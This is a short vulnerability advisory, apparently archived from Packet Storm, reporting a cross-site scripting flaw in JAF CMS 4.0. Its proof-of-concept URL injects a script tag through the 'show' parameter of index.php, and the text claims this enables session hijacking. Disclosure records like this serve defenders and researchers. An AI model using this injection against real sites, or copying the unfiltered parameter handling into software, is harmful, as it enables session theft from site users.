jafcms-xss.txt

2007-05-03T00:00:00
ID PACKETSTORM:56396
Type packetstorm
Reporter Arham Muhammad
Modified 2007-05-03T00:00:00

Description

                                        
                                            `JAF CMS - 4.0 Cross Site Scripting Vulnerability  
  
Source: http://sourceforge.net/projects/jaf-cms/  
  
Author: Arham Muhammad  
  
POC: http://site/path/index.php?show="><script>alert(/xss/);</script>  
  
There Is No Sign Of Filteration In Jaf-Cms, Making It Prune To Xss  
And Session Hijacking!  
`